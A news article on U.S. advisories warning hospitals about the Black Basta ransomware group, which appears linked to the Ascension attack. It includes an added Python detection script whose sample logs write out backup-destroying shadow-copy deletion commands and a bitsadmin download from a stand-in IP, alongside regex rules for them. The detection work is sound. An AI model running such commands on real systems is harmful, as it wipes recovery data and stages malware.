Feds, Groups Warn Health Sector of Black Basta Threats

Advisories Come As Black Basta Appears Responsible for Ascension Ransomware Attack
U.S. federal authorities warned that the Russian-speaking ransomware group Black Basta is actively targeting American critical infrastructure amid reports that it's behind the ransomware attack on hospital chain Ascension.

Ascension is still operating under downtime procedures as it recovers from a cyber incident detected Wednesday that forced it to divert ambulances and postpone nonemergency procedures. The St. Louis, Missouri-based chain of nonprofit Catholic hospitals is one of the largest in the United States (see: Ascension Diverts Emergency Patients, Postpones Care).

Ascension has not commented on a CNN report Friday that attributed the attack to Black Basta, although it does now acknowledge that the incident was a ransomware attack.

A source familiar with the Ascension investigation confirmed Monday to Information Security Media Group that Black Basta appears to be behind the Ascension attack. The hospital chain did not immediately respond to a request for comment.

A growing body of research and analysis concludes that ransomware attacks increase in-hospital mortality rates. An October 2023 working paper by University of Minnesota academics says the rise in in-hospital mortality for already-admitted patients after a ransomware attack is most pronounced among Black patients. The authors said that disproportionate effect can be explained by other research showing that Black patients' health suffers more than white patients' health during times of capacity strain.

Federal agencies behind the Friday warning include the Cybersecurity and Infrastructure Security Agency, the FBI, the Department of Health and Human Services and the Multi-State Information Sharing and Analysis Center. The Health Information Sharing and Analysis Center and the American Hospital Association issued their own alerts based on the joint advisory.

The federal advisory warns that hackers have used Black Basta ransomware to encrypt and steal data from at least 12 of the 16 critical infrastructure sectors, including healthcare. As of this month, Black Basta affiliates have affected more than 500 organizations globally across many sectors, the alert says.

Black Basta first emerged in April 2022 as a spinoff from the Conti ransomware group, which fragmented after Russia's February 2022 invasion of Ukraine (see: Conti's Legacy: What's Become of Ransomware's Most Wanted?).

So far this year, researchers know about ransomware attacks against 12 U.S. healthcare systems with 195 hospitals carried out by a variety of cybercriminal groups, said Brett Callow, a threat analyst at security firm Emsisoft. The overall number of known affected hospital systems last year totaled 46. Hackers stole data in a majority of incidents, Emsisoft found.

Black Basta ransom notes do not generally include an initial ransom demand or payment instructions. Rather, the notes provide victims with a unique code and instruct them to contact the ransomware group via a .onion URL, reachable through the Tor browser. The group typically gives victims between 10 and 12 days to pay a demand before it publishes stolen data.

"Healthcare organizations are attractive targets for cybercrime actors due to their size, technological dependence, access to personal health information, and unique impacts from patient care disruptions," the advisory says.

In its alert, the Health-ISAC said it has assessed that Black Basta represents "a significant threat" to the healthcare sector. "Members are strongly advised to keep an eye on the threat actor and their tactics, techniques and procedures. Black Basta's malware, written in C++, targets both Windows and Linux systems. It encrypts data using ChaCha20 and RSA-4096 and attempts to delete shadow copies and backups," Health-ISAC said.

Black Basta affiliates primarily use spear-phishing to obtain initial access. The researchers said that Black Basta affiliates have also used Qakbot during initial access.

For lateral movement, group affiliates use tools such as BITSAdmin and PsExec, along with Remote Desktop Protocol. Some affiliates also use tools such as Splashtop, ScreenConnect and Cobalt Strike beacons to assist with remote access and lateral movement.
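The behaviors Health-ISAC and the advisory describe above (shadow copy deletion before encryption; BITSAdmin and PsExec for movement) are observable in endpoint telemetry. The following detection sketch is an added example, not code from the advisory or any vendor: it parses constructed, simplified Sysmon-style process-creation lines (the hostnames, users and paths are invented placeholders) and flags the hosts showing those TTPs.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry (simplified Sysmon Event ID 1 key=value lines).
# Hosts, users, paths and the IP are placeholders, not real Ascension or Black Basta data.
SAMPLE_LOGS = [
    'ts=2024-05-08T02:14:07Z host=WS-042 user=CORP\\jdoe image=C:\\Windows\\System32\\vssadmin.exe '
    'cmdline="vssadmin.exe delete shadows /all /quiet"',
    'ts=2024-05-08T02:14:09Z host=WS-042 user=CORP\\jdoe image=C:\\Windows\\System32\\wbem\\WMIC.exe '
    'cmdline="wmic shadowcopy delete"',
    'ts=2024-05-08T02:20:31Z host=WS-042 user=CORP\\jdoe image=C:\\Windows\\System32\\bitsadmin.exe '
    'cmdline="bitsadmin /transfer job1 http://192.0.2.10/a.bin C:\\Users\\Public\\a.bin"',
    'ts=2024-05-08T02:25:12Z host=SRV-FILE01 user=CORP\\svc_backup image=C:\\Windows\\PSEXESVC.exe '
    'cmdline="PSEXESVC.exe"',
    # Benign: listing shadow copies is routine admin work and must not alert.
    'ts=2024-05-08T09:01:00Z host=WS-017 user=CORP\\asmith image=C:\\Windows\\System32\\vssadmin.exe '
    'cmdline="vssadmin.exe list shadows"',
]

# Rules map to the TTPs described in the article: backup/shadow copy destruction,
# BITS-based transfers, and PsExec's service-side binary landing on a remote host.
RULES: List[Tuple[str, re.Pattern]] = [
    ("shadow_copy_deletion", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic\s+shadowcopy\s+delete", re.I)),
    ("bits_transfer", re.compile(r"bitsadmin(\.exe)?\s+/transfer", re.I)),
    ("psexec_service", re.compile(r"\\psexesvc\.exe|psexec(\.exe)?\s", re.I)),
]

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')  # key="quoted value" or key=bare


def parse_line(line: str) -> Dict[str, str]:
    """Split a key=value line into a dict; quoted values may contain spaces."""
    return {k: (q if q else u) for k, q, u in FIELD_RE.findall(line)}


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule that fires on the image path plus command line."""
    haystack = f"{event.get('image', '')} {event.get('cmdline', '')}"
    return [name for name, pattern in RULES if pattern.search(haystack)]


def scan(lines: List[str]) -> Dict[str, List[Tuple[str, str, str]]]:
    """Group (timestamp, user, rule) findings by host so responders can triage per machine."""
    findings: Dict[str, List[Tuple[str, str, str]]] = {}
    for line in lines:
        ev = parse_line(line)
        for rule in classify(ev):
            findings.setdefault(ev["host"], []).append((ev["ts"], ev["user"], rule))
    return findings


if __name__ == "__main__":
    for host, hits in scan(SAMPLE_LOGS).items():
        print(host, hits)
```

A host with `shadow_copy_deletion` followed within minutes by tool staging is the pattern to page on immediately, since the deletion step in the Health-ISAC description precedes encryption.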

Researchers at security firm Rapid7 in a blog post published Friday said the company has identified an ongoing social engineering campaign targeting multiple managed detection and response customers that did not involve ransomware encryption yet appears linked to Black Basta.

"We have observed organizations across various verticals to be affected by these social engineering attempts, including manufacturing, transportation, and food and beverage," said Robert Knapp, a senior manager of Rapid7 incident response services. "The threat of ransomware is real to all organizations, in any industry or vertical, of any size," he said.

Black Basta is distinguished by its rapid execution and strategic targeting, which often lead to swift and severe disruptions compared to other ransomware groups, said Emily Phelps, cybersecurity evangelist at security firm Cyware.

"Black Basta frequently exploits vulnerabilities related to remote access systems and outdated software patches. Healthcare entities should prioritize securing these vulnerabilities to mitigate risks," she said.

About the Author

Marianne Kolbasuk McGee

Executive Editor, HealthcareInfoSecurity, ISMG

McGee is executive editor of Information Security Media Group's media site. She has about 30 years of IT journalism experience, with a focus on healthcare information technology issues for more than 15 years. Before joining ISMG in 2012, she was a reporter at InformationWeek magazine and news site and played a lead role in the launch of InformationWeek's healthcare IT media site.
